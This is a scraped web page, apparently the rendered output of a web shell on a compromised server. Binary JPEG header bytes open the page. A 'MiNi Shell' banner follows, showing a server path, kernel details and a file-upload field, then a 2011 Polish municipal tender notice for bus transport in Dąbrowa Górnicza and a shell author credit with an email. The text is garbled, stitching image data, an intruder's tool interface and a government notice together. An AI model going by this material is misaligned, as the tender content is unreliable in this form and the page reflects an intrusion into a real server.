JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110221/26154-N-2011.html

<p class="kh_header"><b>Dąbrowa Górnicza: Transport drogowy w zakresie przewozu osób na terenie kraju</b><br>
<b>Numer ogłoszenia: 26154 - 2011; data zamieszczenia: 21.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Transport drogowy w zakresie przewozu osób na terenie kraju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia prowadzone jest w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tekst jednolity z 2010 r. Nr 113, poz. 759 z późn. zm.), zwanej dalej Ustawą o wartości zamówienia poniżej kwot dla dostaw i usług określonych w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy. 
Przedmiotem zamówienia jest: 
1. Transport drogowy w zakresie przewozu osób na terenie kraju wg potrzeb
 Zamawiającego, zgodnie z wymogami specyfikacji istotnych warunków zamówienia oraz projektem umowy - Załącznik nr 7 do SIWZ stanowiący jej integralną część.
2.	Wykonanie usługi będzie odbywać się na terenie kraju.
3.	Zamawiający zastrzega sobie prawo sprawdzenia trzeźwości Wykonawcy (kierowcy) oraz stanu technicznego pojazdów Wykonawcy wyłonionego w drodze niniejszego postępowania, każdorazowo po zgłoszeniu planowanego wyjazdu.
4.	Realizacja poszczególnych zleceń odbywać się będzie poprzez poinformowanie Wykonawcy drogą telefoniczną lub faksem przez Zamawiającego o terminie i miejscu transportu, 
z zastrzeżeniem, iż poinformowanie, o którym mowa będzie w terminie nie krótszym niż:
a)	3 dni od zgłoszenia Wykonawcy w przypadku zamówienia dotyczącego autokaru
                 powyżej  40 osób;
b)	1 dnia od zgłoszenia Wykonawcy w przypadku zamówienia dotyczącego autokaru
                 do 20 osób.
5.	Wykonawca zobowiązany będzie m.in.  do:
a)	odbierania osób z siedziby Zamawiającego lub innego wcześniej uzgodnionego miejsca  w wyznaczonym terminie,
b)	przywiezienia osób do siedziby Zamawiającego lub innego wcześniej uzgodnionego
miejsca,
c)	w przypadku awarii pojazdu Wykonawca zobowiązany jest do niezwłocznego
tj. najpóźniej w ciągu 1 godziny podstawienia pojazdu zastępczego o równorzędnym
standardzie i ilości miejsc.
6.	Zamawiający zobowiązuje się w przypadku wyjazdów dłuższych niż jeden dzień do zapewnienia bezpłatnego pobytu i posiłku dla Wykonawcy (kierowcy/ów).
7.	Stan techniczny pojazdów musi spełniać warunki dopuszczenia do ruchu drogowego, zgodne z obowiązującymi przepisami o transporcie drogowym.
8.	Wykonawca zapewnia kierowcę/ów z prawem jazdy kategorii adekwatnej do rodzaju pojazdów, którym świadczona jest usługa (kategoria D)
9.	Wymagane środki transportu jakimi musi dysponować Wykonawca to:
a)	3 autokary o liczbie miejsc siedzących powyżej 40 (oraz jeden zastępczy w przypadku
awarii);
b)	2 autokary/busy o liczbie miejsc siedzących do 20 (oraz jeden zastępczy w przypadku awarii)
10.	Realizacja przedmiotu zamówienia będzie następować poprzez sukcesywne zlecenia Zamawiającego w zależności od zapotrzebowań zgłaszanych przez poszczególne wydziały/komórki równorzędne Urzędu Miejskiego.
11.	W ramach przedmiotu zamówienia oprócz sukcesywnych zleceń jw. Zamawiający zleci następujące zadania:
a)	zawody miejskie Sprawni jak żołnierze - ilość osób około 90 - trasa przejazdu - teren miasta Dąbrowa Górnicza;
b)	 zawody rejonowe Sprawni jak żołnierze - ilość osób około 80 - trasa przejazdu - teren miasta Dąbrowa Górnicza
12.	Przewóz uczniów i nauczycieli na warsztaty prowadzone na ścieżkach przyrodniczo - dydaktycznych.
 W miesiącach kwiecień - czerwiec:
a)	Chorzowski Park Etnograficzny-uczniowie szkół podstawowych 
b)	Chorzowski Park Etnograficzny-uczniowie szkół gimnazjalnych
c)	Wisła, Międzybrodzie Żywieckie-Góra Żar, Ekologiczna elektrownia szczytowo  pompowa
      d)   Błędów, Pustynia Błędowska
      e)   Ośrodek Dydaktyczno-Naukowy w Smoleniu
W miesiącach wrzesień-październik
a)	Park Krajobrazowy Orlich Gniazd Złoty Potok
b)	Ośrodek Dydaktyczno-Naukowy w Smoleniu
c)	Park Krajobrazowy Cysterskie Kompozycje Krajobrazowe Rud Wielkich ( 2 wyjazdy)
Łącznie: dziewięć wyjazdów po 40 osób.
13.	Przewiduje się kilka wyjazdów komisji Rady Miejskiej na terenie Dąbrowy Górniczej oraz ew. 1-2 wyjazdy poza granice miasta. 
14.	Transport autokarowy w związku z organizowaniem Akcji Letniej pn.:Afrykańskie Lato zaangażowany w powyższą akcję będzie m.in. Wydział Zdrowia wspólnie 
z Miejską Biblioteką Publiczną w Dąbrowie Górniczej:

Ilość potrzebnych środków transportu  - 8 autokarów
a)	 ( osiem wyjazdów autokarowych  - autokary na 45 osób ), w dniach 5,12,19,26 lipca 2011r., cztery wyjazdy łącznie (w danym dniu jeden wyjazd-jeden autokar na 45 osób). Miejsce wyjazdu i przyjazdu: Biblioteka Główna Dąbrowa Górn. ul. Kościuszki 25, do Śląskiego Ogrodu Zoologicznego w Chorzowie
15.	Festyn 2 sierpnia 2011
Biblioteka Główna Dąbrowa Górnica  ul. Kościuszki 25 (łącznie 3 autokary na 45osób) Trasy 
(w dwie strony):
a)	2 autokary na trasie Gołonóg ul. Wybickiego (przystanek w stronę Huty Katowice)-Łęknice 	(parking przy aptece koło przystanku autobusowego) - Gołonóg Manhattan (przystanek w 	stronę centrum miasta - Reden (przystanek) -Biblioteka Główna (ul. Kościuszki 25) i droga 	powrotna,
b)	1 autokar na trasie: Strzemieszyce Wielkie (Dworzec PKP) Tucznawa ul. ks.Stanisława 1-Biblioteka-Mydlice (parking przy administracji)-Biblioteka ul. Kościuszki 25 i droga powrotna,
16.	Wycieczka do Szkoły Policji w Katowicach w m-cu czerwcu 2011r.
	( 1 autokar 45 osób ). Wyjazd i przyjazd z/do Zespół Szkół Ogólnokształcących  nr 2 
           Dąbrowa Górnicza ul. Prusa 3.
17.	Przejazd przedstawicieli  organizacji pozarządowych na  Ogólnopolskie Forum Organizacji Pozarządowych (wrzesień 2011r.)
a)	1 autokar, ilość osób ok.40, trasa: Dąbrowa G.-Warszawa, Warszawa-Dąbrowa G.
18. We wrześniu w ramach  imprezy Dożynki Miejskie 2011, przewóz osób z Kół Gospodyń
            Wiejskich z poszczególnych dzielnic, do Parku Hallera-ok.200 osób.
19.	Na przełomie lipca-sierpnia - przewóz dzieci i młodzieży..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego w stosunku do zamówienia podstawowego opisanego w specyfikacji na podstawie art.67 ust.1 pkt. 6 Ustawy. 
Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego w stosunku do zamówienia podstawowego opisanego w specyfikacji na podstawie art.67 ust.1 pkt 6 Ustawy. Realizacja zamówień uzupełniających dot. będzie zakresu przewidzianego opisem przedmiotu zamówienia i określonym kodem CPV.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób  na podstawie art. 5 ust. 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2007 r. Nr 125, poz. 874 z późn. zm.),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie należycie wykonał lub wykonuje usługi min. 1 usługę w zakresie transportu publicznego w tym: wycieczki, pielgrzymki, imprezy okolicznościowe itp. o wartości nie mniejszej niż 30 000,00 zł netto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
a) co najmniej 3 autokarami o liczbie miejsc siedzących powyżej 40 /oraz 1 zastępczy 
w przypadku awarii/,
b/ co najmniej 2 autokarami / busy o liczbie miejsc siedzących do 20 /oraz 1 zastępczy 
w przypadku awarii/</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonaniu  zamówienia tj.: przynajmniej 5 osobami, które posiadają uprawnienia do prowadzenia pojazdów mechanicznych  i przewozu osób na terenie kraju tj. min prawo jazdy kat. D.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy załączyć:
1.Wypełniony Druk Ofertowy - załącznik nr 1 SIWZ - wskazana data podpisania.
2.Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b ustawy.
3.Pełnomocnictwo do reprezentowania:
3.1.	wymagane w przypadku gdy Wykonawcę reprezentuje w postępowaniu osoba bądź osoby, których uprawnienie do reprezentowania nie wynika bezpośrednio z innych załączonych dokumentów, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;
3.2.	wymagane w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (dotyczy również spółki cywilnej), przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
a.	wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne 
i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące  
niemożliwość wywiązania się z umowy w jej obecnym brzmieniu. Wydarzenia takie mogą obejmować w szczególności: wojny, pożary, powodzie, embarga przewozowe, strajki oraz oficjalne decyzje organów władzy państwowej,
b.	zmiany przepisów mających wpływ na treść zawartej umowy,
c.	wystąpienia konieczności ograniczenia środków budżetowych Gminy w danym
roku Zamawiającemu przysługuje prawo ograniczenia zakresu prac z równoczesną korektą 
należnego wynagrodzenia przysługującego Wykonawcy,
W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy                     
           z przyczyn, o których mowa w pkt. 25.4. SIWZ, Wykonawca zobowiązany jest do
           niezwłocznego poinformowania o tym fakcie Zamawiającego i  wystąpienia z wnioskiem 
           o  dokonanie wskazanej zmiany.
Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół 
          podpisany przez obie strony.
Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie 
          strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać
          uzasadnienie faktyczne i prawne.
 Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest 
           dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
 Pozostałe kwestie odnoszące się do umowy uregulowane są w Załączniku nr 8 do
 SIWZ  projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, 41-300 Dąbrowa Górnicza, ul. Graniczna 21, Wydziału Kultury i Sportu, piętro III pokój nr 301.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2011 godzina 11:00, miejsce: Urząd  Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, stanowisko nr 13- INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej. 2. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.3. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni 
spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ
          oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków
          zgodnie z zapisami zawartymi w punkcie 9  i 10 SIWZ.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez 
dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia 
wymienione w pkt. 10.1.- 10.2. SIWZ przez każdego z nich. Dokumenty i oświadczenia   wymienione w pkt. 9 SIWZ wspólnie. Oświadczenie wymienione w pkt. 9.2. SIWZ - winno być
podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie (na jednym
druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Formularz ofertowy wymieniony w pkt. 10.3. SIWZ winien być podpisany przez
uprawnionych przedstawicieli Wykonawców.
Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich
         w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy 
        w sprawie zamówienia publicznego. 
Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.4.Informacje dodatkowe dotyczące kryterów oceny ofert: Oferty zostaną poddane ocenie indywidualnej przez każdego z członków Komisji Przetargowej w oparciu o następujące kryterium i jego znaczenie:
a)cena za 1 km przejazdu autokarem o liczbie miejsc siedzących powyżej 40	          - 35%
b)	cena za 1 km przejazdu autokarem o liczbie miejsc siedzących do 20 		           - 35%
c)	cena za 1 godz. postoju autokaru o liczbie miejsc siedzących 
powyżej 40 za każdą rozpoczętą godzinę postoju powyżej pierwszej godziny postoju 	-15%
d)	cena za 1 godz. postoju autokaru o liczbie miejsc siedzących do 20 za każdą 
rozpoczętą godzinę postoju powyżej pierwszej godziny postoju		 	          - 15%.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com